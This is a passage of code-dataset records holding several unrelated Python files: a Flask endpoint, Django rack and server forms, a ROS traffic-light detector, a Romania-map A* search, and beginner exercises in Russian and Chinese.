edited_info['is_checked'] = 1\n return jsonify(edited_info)\n return jsonify({'url': url, 'is_checked': 0})\n\n\n@app.route('/meta')\ndef meta():\n lang = get_lang()\n with open(os.path.join(here, 'data', 'meta.json')) as f:\n meta_info = json.load(f)\n\n def reshape_country(country):\n return {\n 'country': country['country'],\n 'name': country['name'][lang],\n 'language': country['language'],\n 'representativeSiteUrl': country['representativeSiteUrl']\n }\n\n meta_info = {\n 'topics': [topic[lang] for topic in meta_info['topics']],\n 'countries': [reshape_country(country) for country in meta_info['countries']]\n }\n\n with open(os.path.join(here, 'data', 'stats.json')) as f:\n stats_info = json.load(f)['stats']\n\n with open(os.path.join(here, 'data', 'sources.json')) as f:\n sources_info = json.load(f)\n\n country_code_index_map = {country['country']: i for i, country in enumerate(meta_info['countries'])}\n for country_code in stats_info:\n meta_info['countries'][country_code_index_map[country_code]]['stats'] = stats_info[country_code]\n meta_info['countries'][country_code_index_map[country_code]]['sources'] = sources_info[country_code]\n\n return jsonify(meta_info)\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.errorhandler(InvalidPassword)\ndef handle_invalid_password(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227086563","text":"#!/usr/bin/env python\n\n\"\"\"\nСоздать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.\nОпределить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.\nВыполнить подсчет средней величины дохода сотрудников.\n\"\"\"\n\nTEXT_FILE = \"task03.txt\"\nWORKERS = []\n\n\ndef read_file(file_name):\n try:\n with open(file_name, \"r\") as t_file:\n for line in t_file:\n t = line.split(\",\")\n worker = {\n \"Last name\": t[0],\n \"Salary\": int(t[1])\n }\n WORKERS.append(worker)\n except FileNotFoundError:\n print(f\"File '{TEXT_FILE}' not found\")\n exit(1)\n\n\ndef calculate_statistic(workers):\n low_payed_workers = []\n avg_salary = 0\n for worker in workers:\n avg_salary += worker[\"Salary\"]\n if worker[\"Salary\"] < 20000:\n low_payed_workers.append(worker[\"Last name\"])\n\n avg_salary = avg_salary / len(workers)\n\n print(f\"Average salary: {avg_salary}\")\n print(f\"Worker with salary less than 20k: {low_payed_workers}\")\n\n\ndef main():\n read_file(TEXT_FILE)\n calculate_statistic(WORKERS)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-5/task03.py","file_name":"task03.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452466897","text":"# coding: utf-8\nfrom django import forms\nfrom django.utils.translation import ugettext as _\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, HTML, Button, Row, Field\nfrom crispy_forms.bootstrap import AppendedText, PrependedText, FormActions\n\nfrom erp_test.models import Basket, Rack, Server\nfrom erp_test.exceptions import BasketIsFilled, BasketSlotIsBusy\n\n\nclass BasketForm(forms.ModelForm):\n\n helper = FormHelper()\n helper.form_class = 'form-horizontal'\n helper.layout = Layout(\n Div(\n Div('name'),\n css_class='row-fluid'\n ),\n Div(\n Div('slot_qty'),\n css_class='row-fluid'\n ),\n Div(\n Div('unit_takes'),\n css_class='row-fluid'\n ),\n\n FormActions(\n Submit('save_changes', _('Save changes'), css_class=\"btn-primary\"),\n Submit('cancel', 'Cancel'),\n )\n )\n\n class Meta:\n model = Basket\n fields = ('name', 'slot_qty', 'unit_takes')\n\n\nclass BasketRackForm(forms.Form):\n\n rack = forms.ChoiceField(\n choices=[('', 'Choose a rack')],\n required=True,\n help_text='displayed only racks with enough gap for the basket')\n position = forms.IntegerField(\n required=False,\n min_value=1)\n\n def __init__(self, *args, **kwargs):\n self.basket = kwargs.pop('basket', None)\n super(BasketRackForm, self).__init__(*args, **kwargs)\n if self.basket:\n racks = Rack.objects.with_fullness('has_empty_height', self.basket.get_height())\n if self.basket.rack:\n racks = list(racks.exclude(id=self.basket.rack.pk))\n racks.insert(0, self.basket.rack)\n self.fields['rack'].choices += [\n (r.id, r.get_name())\n for r in racks\n ]\n\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.form_class = 'form-horizontal'\n self.helper.layout = Layout(\n Div(\n Div('rack'),\n css_class='row-fluid'\n ),\n Div(\n Div('position'),\n css_class='row-fluid'\n ),\n\n FormActions(\n Submit('save_changes', _('Save changes'), css_class=\"btn-primary\"),\n Submit('cancel', 'Cancel'),\n )\n )\n\n\nclass BasketServerForm(forms.Form):\n\n server = forms.ChoiceField(\n choices=[('', 'Choose a server')],\n required=True,\n help_text='displayed only uninstalled servers')\n position = forms.IntegerField(\n required=False,\n min_value=1)\n\n def __init__(self, *args, **kwargs):\n self.basket = kwargs.pop('basket', None)\n self.server = kwargs.pop('server', None)\n super(BasketServerForm, self).__init__(*args, **kwargs)\n\n servers = Server.objects.uninstalled()\n if self.server:\n servers = list(servers.exclude(id=self.server.pk))\n servers.insert(0, self.server)\n self.fields['server'].choices += [\n (s.id, s.get_name())\n for s in servers\n ]\n\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.form_class = 'form-horizontal'\n self.helper.layout = Layout(\n Div(\n Div('server'),\n css_class='row-fluid'\n ),\n Div(\n Div('position'),\n css_class='row-fluid'\n ),\n\n FormActions(\n Submit('save_changes', _('Save changes'), css_class=\"btn-primary\"),\n Submit('cancel', 'Cancel'),\n )\n )\n\n def clean_position(self):\n pos = self.cleaned_data.get('position', None)\n if not pos:\n try:\n pos = self.basket.find_free_position()\n except BasketIsFilled:\n raise forms.ValidationError(_('Basket has no free slots.'), code='invalid')\n\n if pos > self.basket.slot_qty:\n raise forms.ValidationError(_('Basket has only {} slots.').format(self.basket.slot_qty), code='invalid')\n\n try:\n self.basket.validate_position(pos)\n except BasketSlotIsBusy:\n raise forms.ValidationError(_('This slot already taken.'), code='invalid')\n\n return pos\n","sub_path":"src/mbtest1/erp_client/forms/baskets.py","file_name":"baskets.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158172269","text":"#!/usr/bin/env python\nimport math\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose, Point\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport tf\n#from math import inf\nimport numpy as np\nimport cv2\nimport yaml\nimport math\nimport time\n\nSTATE_COUNT_THRESHOLD = 3\n\nclass TLDetector(object):\n def __init__(self):\n rospy.init_node('tl_detector')\n\n self.image_count = 467\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n\n # can be used used to determine the vehicle's location.\n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n # provides the complete list of waypoints for the course.\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n\n # provides an image stream from the car's camera. These images are used to determine the color of upcoming traffic lights.\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n\n self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)\n\n self.bridge = CvBridge()\n self.light_classifier = TLClassifier()\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n self.closest_waypoint = 0\n\n self.IGNORE_DISTANCE_LIGHT = 90.0\n self.old_stop_line_pos_wp = []\n self.last_car_position = 0\n rospy.spin()\n\n def pose_cb(self, msg):\n self.pose = msg\n\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints.waypoints\n\n def traffic_cb(self, msg):\n self.lights = msg.lights\n\n def image_cb(self, msg):\n \"\"\"Identifies red lights in the incoming camera image and publishes the index\n of the waypoint closest to the red light's stop line to /traffic_waypoint\n\n Args:\n msg (Image): image from car-mounted camera\n\n \"\"\"\n #rospy.loginfo('image_cb')\n start_time = time.time()\n\n self.has_image = True\n self.camera_image = msg\n light_wp, state = self.process_traffic_lights()\n rospy.loginfo('tl state = ' + str(state))\n\n '''\n Publish upcoming red lights at camera frequency.\n Each predicted state has to occur `STATE_COUNT_THRESHOLD` number\n of times till we start using it. Otherwise the previous stable state is\n used.\n '''\n if self.state != state:\n self.state_count = 0\n self.state = state\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n light_wp = light_wp if state == TrafficLight.RED else -1\n self.last_wp = light_wp\n self.upcoming_red_light_pub.publish(Int32(light_wp))\n else:\n self.upcoming_red_light_pub.publish(Int32(self.last_wp))\n self.state_count += 1\n \n elapsed_time = time.time() - start_time\n rospy.loginfo('image_cb time = %0.1fus\\n' % (1000.0*1000*elapsed_time))\n\n\n def get_closest_waypoint(self, pose):\n \"\"\"Identifies the closest path waypoint to the given position\n https://en.wikipedia.org/wiki/Closest_pair_of_points_problem\n Args:\n pose (Pose): position to match a waypoint to\n Returns:\n int: index of the closest waypoint in self.waypoints\n \"\"\"\n \n pos = pose.position\n l_id = 0\n r_id = len(self.waypoints) - 1\n m_id = len(self.waypoints)-1\n\n while l_id < r_id:\n ldist = self.pos_distance(self.waypoints[l_id].pose.pose.position, pos)\n rdist = self.pos_distance(self.waypoints[r_id].pose.pose.position, pos)\n xmid = (l_id + r_id) // 2\n mdist = self.pos_distance(self.waypoints[xmid].pose.pose.position, pos)\n\n closest_dist = ldist\n m_id = l_id\n if mdist < closest_dist:\n closest_dist = mdist\n m_id = xmid\n if rdist < closest_dist:\n closest_dist = rdist\n m_id = r_id\n\n # If l_id is right before xmid and xmid is right before r_id,\n # then xmid is the closest waypoint\n if l_id == xmid -1 and xmid == r_id -1:\n break\n\n # c: car\n # l: left point\n # r: right point\n # m: xmid\n # *: closest waypoint\n if rdist < mdist:\n if ldist < rdist:\n # l--c----r--m\n r_id = xmid - 1\n else:\n # l----c--r--m\n l_id = xmid + 1\n\n elif mdist < closest_dist:\n # l--c--m--*--r\n l_id = xmid-1\n elif mdist > closest_dist :\n # l--c--*--m--r\n r_id = xmid+1\n\n elif mdist == closest_dist:\n # ?-cm-?\n if ldist < rdist:\n # l--cm---r\n r_id = xmid + (r_id - xmid) // 2\n elif rdist < ldist:\n # l---cm--r\n l_id = xmid - (xmid - l_id) // 2\n\n return m_id\n\n def pos_distance(self, a, b):\n \"\"\" Distance between two positions\n \"\"\"\n return math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)\n\n def distance_2d(self, a, b):\n return math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2)\n\n def project_to_image_plane(self, point_in_world):\n \"\"\"Project point from 3D world coordinates to 2D camera image location\n\n Args:\n point_in_world (Point): 3D location of a point in the world\n\n Returns:\n x (int): x coordinate of target point in image\n y (int): y coordinate of target point in image\n\n \"\"\"\n\n\n # From udacity.\n fx = 2574\n fy = 2744\n image_width = self.config['camera_info']['image_width']\n image_height = self.config['camera_info']['image_height']\n\n trans = None\n\n try:\n now = rospy.Time.now()\n self.listener.waitForTransform(\"/base_link\",\n \"/world\", now, rospy.Duration(1.0))\n (trans, rot) = self.listener.lookupTransform(\"/base_link\",\n \"/world\", now)\n\n except (tf.Exception, tf.LookupException, tf.ConnectivityException):\n rospy.logerr(\"Failed to find camera to map transform\")\n\n # Use tranform and rotation to calculate 2D position of light in image\n if (trans != None):\n # Convert rotation vector so we can use it.\n yaw = tf.transformations.euler_from_quaternion(rot)[2]\n\n # Rotation followed by translation\n px = point_in_world.x\n py = point_in_world.y\n pz = point_in_world.z\n xt = trans[0]\n yt = trans[1]\n zt = trans[2]\n\n Rnt = (\n px * math.cos(yaw) - py * math.sin(yaw) + xt,\n px * math.sin(yaw) + py * math.cos(yaw) + yt,\n pz + zt)\n\n u = int(fx * -Rnt[1] / Rnt[0] + image_width / 2 - 30)\n v = int(fy * -(Rnt[2] - 1.0) / Rnt[0] + image_height + 50)\n\n light_width = 1.0\n light_height = 1.95\n\n distance = self.distance_2d(self.pose.pose.position, point_in_world)\n\n # Size of traffic light within 2D picture\n light_width_estimate = 2 * fx * math.atan(light_width / (2 * distance))\n light_height_estimate = 2 * fx * math.atan(light_height / (2 * distance))\n # Get points for traffic light's bounding box\n bbox_topleft = (int(u - light_width_estimate / 2), int(v - light_height_estimate / 2))\n bbox_bottomright = (int(u + light_width_estimate / 2), int(v + light_height_estimate / 2))\n else:\n # No translation matrix so we cannot find the light.\n bbox_topleft = (0, 0)\n bbox_bottomright = (0, 0)\n\n return (bbox_topleft, bbox_bottomright)\n\n\n def resize_image(self, img, width, height):\n \n aspect_ratio_width = 0.5\n aspect_ratio_height = height/width\n img_height, img_width = img.shape[:2]\n crop_height = int(img_width / aspect_ratio_width)\n extra_height = (img_height - crop_height) / 2\n crop_width = int(img_height / aspect_ratio_height)\n extra_width = (img_width - crop_width) / 2\n # Crop image to keep aspect ratio\n if extra_height > 0:\n crop_img = img[int(extra_height):int(img_height-math.ceil(extra_height)), 0:int(img_width)]\n elif extra_width > 0:\n crop_img = img[0:int(img_height), int(extra_width):int(img_width-math.ceil(extra_width))]\n else:\n crop_img = img\n\n return cv2.resize(crop_img, (width, height), 0, 0, interpolation=cv2.INTER_AREA)\n\n def get_light_state(self, light):\n \"\"\"Determines the current color of the traffic light\n\n Args:\n light (TrafficLight): light to classify\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n if(not self.has_image):\n self.prev_light_loc = None\n return False\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n pt = Point()\n pt.x = light.pose.pose.position.x\n pt.y = light.pose.pose.position.y\n pt.z = 0\n \n # Convert given traffic light coordinates into position within 2D image\n tleft, bright = self.project_to_image_plane(light.pose.pose.position)\n cropped_image = cv_image[tleft[1]:bright[1], tleft[0]:bright[0]]\n\n if (cropped_image.shape[0] > 0 and cropped_image.shape[1] > 0):\n cropped_image = self.resize_image(cropped_image, 30, 60)\n\n #Get classification\n clazz = self.light_classifier.get_classification(cropped_image)\n #rospy.loginfo(clazz)\n\n return clazz\n\n def process_traffic_lights(self):\n \"\"\"Finds closest visible traffic light, if one exists, and determines its\n location and color\n Returns:\n int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n \"\"\"\n light = None\n #rospy.loginfo('self.waypoints = ' + str(self.waypoints))\n\n if self.waypoints is None:\n rospy.logerr('self.waypoints is None')\n\n if self.waypoints is not None:\n # List of positions that correspond to the line to stop in front of for a given intersection\n stop_line_positions = self.config['stop_line_positions']\n if(self.pose):\n car_position = self.get_closest_waypoint(self.pose.pose)\n\n #find the closest visible traffic light (if one exists)\n light = self.get_closest_light(self.pose.pose)\n\n if light:\n light_wp = self.get_closest_waypoint(light.pose.pose)\n state = self.get_light_state(light)\n\n # Debugging traffic light:\n #\n # rospy.loginfo(\"light_xyz: ({}, {}, {}), wp_xyz({}): ({}, {}, {})\".format(\n # light.pose.pose.position.x,\n # light.pose.pose.position.y,\n # light.pose.pose.position.z,\n # light_wp,\n # self.waypoints[light_wp].pose.pose.position.x,\n # self.waypoints[light_wp].pose.pose.position.y,\n # self.waypoints[light_wp].pose.pose.position.z\n # ))\n return light_wp, state\n #self.waypoints = None\n return -1, TrafficLight.UNKNOWN\n\n def get_closest_light(self, pose):\n \"\"\" Get the position of the closest traffic light.\n\n Args:\n pose (Pose): Position of car.\n Returns:\n TrafficLight: light object.\n \"\"\"\n # Decide if we should have a horizon (a max distance at which the car will try and capture the light).\n horizon = 100\n\n min_dist = float(\"inf\")\n light = None\n #rospy.loginfo('self.lights = ' + str(self.lights))\n\n for l in self.lights:\n dist = self.pos_distance(pose.position, l.pose.pose.position)\n if dist < min_dist and dist < horizon:\n min_dist = dist\n light = l\n return light\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":13610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"411145316","text":"\nfrom googlestaticmaps import get_map_at_lonlat, GoogleMapType\n\n\n# Get google maps apikey\ntry:\n with open(\"googlemaps_apikey.txt\") as fh:\n googlemaps_apikey = fh.read()\n fh.close()\nexcept IOError:\n print(\"No google maps apikey found!\")\n quit(-1)\n\nimg = get_map_at_lonlat(11.620967, 48.316362, 16, apikey=googlemaps_apikey, imgSize=(700, 700), mapType=GoogleMapType.Hybrid).mapImage\nimg.show()\n","sub_path":"tests/show_kreuz_neufahrn.py","file_name":"show_kreuz_neufahrn.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"183318284","text":"from heapq import heappush\nfrom heapq import heappop\n\nclass City:\n def __init__(self,name, h):\n self.name = name\n self.neighboors = []\n self.h = h\n\n def addNeighboors(self,neighboors):\n for city in neighboors:\n self.neighboors.append(city)\n\narad = City('Arad', 366)\nzerind = City('Zerind', 374)\nsibiu = City('Sibiu', 253)\ntimisoara = City('Timisoara', 329)\noradea = City('Oradea', 380)\nlugoj = City('Lugoj', 244)\nfagaras = City('Fagaras', 178)\nvilcea = City('R. Vilcea', 193)\nmehadia = City('Mehadia', 241)\nbucharest = City('Bucharest', 0)\npitesti = City('Pitesti', 98)\ncraiova = City('Craiova', 160)\ndobreta = City('Dobreta', 242)\nurziceni = City('Urziceni', 80)\ngiurgiu = City('Giurgiu', 77)\nvaslui = City('Vaslui', 199)\nhirsova = City('Hirsova', 151)\niasi = City('Iasi', 226)\neforie = City('Eforie', 161)\nneamt = City('Neamt', 234)\n\narad.addNeighboors([(75, zerind), (140, sibiu), (118,timisoara)])\nzerind.addNeighboors([(71, oradea), (75, arad)])\nsibiu.addNeighboors([(151,oradea), (140,arad), (99, fagaras), (80, vilcea)])\ntimisoara.addNeighboors([(118, arad), (111, lugoj)])\noradea.addNeighboors([(71,zerind), (151,sibiu)])\nlugoj.addNeighboors([(111,timisoara),(70, mehadia)])\nmehadia.addNeighboors([(70, lugoj),(75, dobreta)])\ndobreta.addNeighboors([(75, mehadia),(120, craiova)])\ncraiova.addNeighboors([(120, dobreta),(146, vilcea),(138, pitesti)])\nvilcea.addNeighboors([(80, sibiu),(146, craiova),(97, pitesti)])\npitesti.addNeighboors([(97, vilcea),(138, craiova),(101, bucharest)])\nfagaras.addNeighboors([(99,sibiu),(211,bucharest)])\nbucharest.addNeighboors([(101, pitesti),(211, fagaras),(90, giurgiu),(85, urziceni)])\ngiurgiu.addNeighboors([(90, bucharest)])\nurziceni.addNeighboors([(85, bucharest),(98,hirsova),(142, vaslui)])\nhirsova.addNeighboors([(98, urziceni),(86, eforie)])\neforie.addNeighboors([(86, hirsova)])\nvaslui.addNeighboors([(142, urziceni),(92, iasi)])\niasi.addNeighboors([(92, vaslui),(87, neamt)])\nneamt.addNeighboors([(87,iasi)])\n\nclass State:\n def __init__(self, city, g, parent):\n self.parent = parent\n self.city = city\n self.g = g\n\n def __lt__(self, other):\n return self.g3d}{:>3d}{:>3d}'.format(ll[j],ll[j+1],ll[j+2]))\r\nprint(summ)\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 602 撲克牌總和\r\n請撰寫一程式,讓使用者輸入52張牌中的5張,計算並輸出其總和。\r\n提示:J、Q、K以及A分別代表11、12、13以及1。\r\n\r\n輸入說明\r\n5張牌數\r\n輸出說明\r\n5張牌的數值總和\r\n\r\n範例輸入\r\n5\r\n10\r\nK\r\n3\r\nA\r\n範例輸出\r\n32\r\n\"\"\"\r\nll=[]\r\nfor i in range(5):\r\n x=input()\r\n if x=='A':\r\n ll.append(1)\r\n elif x=='K':\r\n ll.append(13)\r\n elif x=='Q':\r\n ll.append(12)\r\n elif x=='J':\r\n ll.append(11)\r\n else:\r\n ll.append(int(x))\r\nprint(sum(ll))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 603 數字排序\r\n請撰寫一程式,要求使用者輸入十個數字並存放在串列中。\r\n接著由大到小的順序顯示最大的3個數字。\r\n\r\n輸入說明\r\n十個數字\r\n輸出說明\r\n由大到小排序,顯示最大的3個數字\r\n\r\n範例輸入1\r\n40\r\n32\r\n12\r\n29\r\n20\r\n19\r\n38\r\n48\r\n57\r\n44\r\n範例輸出1\r\n57 48 44\r\n\"\"\"\r\nll=[]\r\nfor i in range(10):\r\n x=int(input())\r\n ll.append(x)\r\nprint(sorted(ll)[-1],sorted(ll)[-2],sorted(ll)[-3])\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 604 眾數\r\n請撰寫一程式,讓使用者輸入十個整數作為樣本數,\r\n輸出眾數(樣本中出現最多次的數字)及其出現的次數。\r\n提示:假設樣本中只有一個眾數。\r\n\r\n輸入說明\r\n十個整數\r\n輸出說明\r\n眾數\r\n眾數出現的次數\r\n\r\n範例輸入\r\n34\r\n18\r\n22\r\n32\r\n18\r\n29\r\n30\r\n38\r\n42\r\n18\r\n範例輸出\r\n18\r\n3\r\n\"\"\"\r\nimport numpy as np\r\n# ll=[34,18,22,32,18,29,30,38,42,18]\r\nll=[]\r\nfor i in range(10):\r\n x=int(input())\r\n ll.append(x)\r\n\r\nll2=list(np.unique(ll))\r\nll3=[]\r\nfor j in range(len(ll2)):\r\n ll3.append(ll.count(ll2[j]))\r\n\r\nprint(ll2[ll3.index(max(ll3))])\r\nprint(max(ll3))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 605 成績計算\r\n請撰寫一程式,讓使用者輸入十個成績,\r\n接下來將十個成績中最小和最大值(最小、最大值不重複)\r\n以外的成績作加總及平均,並輸出結果。\r\n\r\n提示:平均值輸出到小數點後第二位。\r\n\r\n輸入說明\r\n十個數字\r\n輸出說明\r\n總和\r\n平均\r\n\r\n範例輸入\r\n89\r\n78\r\n67\r\n80\r\n75\r\n98\r\n77\r\n89\r\n76\r\n60\r\n範例輸出\r\n631\r\n78.88\r\n\"\"\"\r\n#ll=[89,78,67,80,75,98,77,89,76,60]\r\nll=[]\r\nfor i in range(10):\r\n x=int(input())\r\n ll.append(x)\r\n\r\nmaxx=max(ll)\r\nminn=min(ll)\r\nll.remove(maxx)\r\nll.remove(minn)\r\nprint(sum(ll))\r\nprint('{:.2f}'.format(sum(ll)/len(ll)))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 606 二維串列行列數\r\n請撰寫一程式,讓使用者輸入兩個正整數rows、cols,\r\n分別表示二維串列lst 的「第一個維度大小」與「第二個維度大小」。\r\n串列元素[row][col]所儲存的數字,其規則為:\r\nrow、col 的交點值 = 第二個維度的索引col – 第一個維度的索引row。\r\n接著以該串列作為參數呼叫函式compute()輸出串列。\r\n\r\n提示:欄寬為4。\r\n\r\n輸入說明\r\n兩個正整數(rows、cols)\r\n輸出說明\r\n格式化輸出row、col的交點值\r\n\r\n範例輸入\r\n5\r\n10\r\n範例輸出\r\n 0 1 2 3 4 5 6 7 8 9\r\n -1 0 1 2 3 4 5 6 7 8\r\n -2 -1 0 1 2 3 4 5 6 7\r\n -3 -2 -1 0 1 2 3 4 5 6\r\n -4 -3 -2 -1 0 1 2 3 4 5\r\n\"\"\"\r\nroww=int(input())\r\ncoll=int(input())\r\n\r\ndef compute(row,col):\r\n for i in range(1,roww+1):\r\n for j in range(1,col+1):\r\n print('{:>4d}'.format(j-i),sep='',end='')\r\n print()\r\n\r\ncompute(roww,coll)\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 607 成績計算\r\n請撰寫一程式,讓使用者輸入三位學生各五筆成績,\r\n接著再計算並輸出每位學生的總分及平均分數。\r\n\r\n提示:平均分數輸出到小數點後第二位。\r\n\r\n輸入說明\r\n三位學生各五筆成績\r\n輸出說明\r\n格式化輸出每位學生的總分及平均分數\r\n\r\n輸入與輸出會交雜如下,輸出的部份以粗體字表示\r\nThe 1st student:\r\n78\r\n89\r\n88\r\n70\r\n60\r\nThe 2nd student:\r\n90\r\n78\r\n66\r\n68\r\n78\r\nThe 3rd student:\r\n69\r\n97\r\n70\r\n89\r\n90\r\nStudent 1\r\n#Sum 385\r\n#Average 77.00\r\nStudent 2\r\n#Sum 380\r\n#Average 76.00\r\nStudent 3\r\n#Sum 415\r\n#Average 83.00\r\n\"\"\"\r\nprint('The 1st student:')\r\nl1=[]\r\nfor i in range(5):\r\n l1.append(int(input()))\r\n\r\nprint('The 2nd student:')\r\nl2=[]\r\nfor i in range(5):\r\n l2.append(int(input()))\r\n\r\nprint('The 3rd student:')\r\nl3=[]\r\nfor i in range(5):\r\n l3.append(int(input()))\r\n\r\nimport numpy as np\r\n\r\nprint('Student 1')\r\nprint('#Sum {:d}'.format(sum(l1)))\r\nprint('#Average {:.2f}'.format(np.mean(l1)))\r\n\r\nprint('Student 2')\r\nprint('#Sum {:d}'.format(sum(l2)))\r\nprint('#Average {:.2f}'.format(np.mean(l2)))\r\n\r\nprint('Student 3')\r\nprint('#Sum {:d}'.format(sum(l3)))\r\nprint('#Average {:.2f}'.format(np.mean(l3)))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 608 最大最小值索引\r\n請撰寫一程式,讓使用者建立一個3*3的矩陣,\r\n其內容為從鍵盤輸入的整數(不重複),\r\n接著輸出矩陣最大值與最小值的索引。\r\n\r\n輸入說明\r\n九個整數\r\n輸出說明\r\n矩陣最大值及其索引\r\n矩陣最小值及其索引\r\n\r\n範例輸入\r\n6\r\n4\r\n8\r\n39\r\n12\r\n3\r\n-3\r\n49\r\n33\r\n範例輸出\r\nIndex of the largest number 49 is: (2, 1)\r\nIndex of the smallest number -3 is: (2, 0)\r\n\"\"\"\r\nll=[]\r\nfor i in range(9): ll.append(int(input()))\r\nprint('Index of the largest number {:d} is: ({:d}, {:d})'\r\n .format(max(ll), ll.index(max(ll))//3, ll.index(max(ll))%3))\r\n\r\nprint('Index of the smallest number {:d} is: ({:d}, {:d})'\r\n .format(min(ll), ll.index(min(ll))//3, ll.index(min(ll))%3))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 609 矩陣相加\r\n請撰寫一程式,讓使用者建立兩個2*2的矩陣,\r\n其內容為從鍵盤輸入的整數,\r\n接著輸出這兩個矩陣的內容以及它們相加的結果。\r\n\r\n輸入說明\r\n兩個2*2矩陣,皆輸入整數\r\n輸出說明\r\n矩陣1的內容\r\n矩陣2的內容\r\n矩陣1及矩陣2相加的結果\r\n\r\n輸入與輸出會交雜如下\r\nEnter matrix 1:\r\n[1, 1]: 3\r\n[1, 2]: 5\r\n[2, 1]: 7\r\n[2, 2]: 5\r\nEnter matrix 2:\r\n[1, 1]: 6\r\n[1, 2]: 9\r\n[2, 1]: 8\r\n[2, 2]: 3\r\n\r\nMatrix 1:\r\n**3 5 **\r\n**7 5 **\r\nMatrix 2:\r\n**6 9 **\r\n**8 3 **\r\nSum of 2 matrices:\r\n**9 14 **\r\n**15 8 **\r\n\"\"\"\r\nla=[]\r\nprint('Enter matrix 1:')\r\nfor i in range(4): \r\n la.append(int(input('[{:d}, {:d}]: '\r\n .format((i//2)+1, (i%2)+1))))\r\n\r\nlb=[]\r\nprint('Enter matrix 2:')\r\nfor i in range(4): \r\n lb.append(int(input('[{:d}, {:d}]: '\r\n .format((i//2)+1, (i%2)+1))))\r\n\r\nlc=[]\r\nfor i in range(4): lc.append(la[i] + lb[i])\r\n\r\nprint('Matrix 1:\\n{} {} \\n{} {} '\r\n .format(la[0], la[1], la[2], la[3]))\r\nprint('Matrix 2:\\n{} {} \\n{} {} '\r\n .format(lb[0], lb[1], lb[2], lb[3]))\r\nprint('Sum of 2 matrices:\\n{} {} \\n{} {} '\r\n .format(lc[0], lc[1], lc[2], lc[3]))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 610 平均溫度\r\n請撰寫一程式,讓使用者輸入四週各三天的溫度,\r\n接著計算並輸出這四週的平均溫度及最高、最低溫度。\r\n\r\n提示1:平均溫度輸出到小數點後第二位。\r\n提示2:最高溫度及最低溫度的輸出,如為31時,\r\n 則輸出31,如為31.1時,則輸出31.1。\r\n\r\n輸入說明\r\n四週各三天的溫度\r\n輸出說明\r\n平均溫度\r\n最高溫度\r\n最低溫度\r\n\r\n輸入輸出範例\r\nWeek 1:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nWeek 2:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nWeek 3:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nWeek 4:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nAverage: 28.11\r\nHighest: 35.3\r\nLowest: 23.1\r\n\"\"\"\r\nimport numpy as np\r\nll=[]\r\nfor i in range(12):\r\n 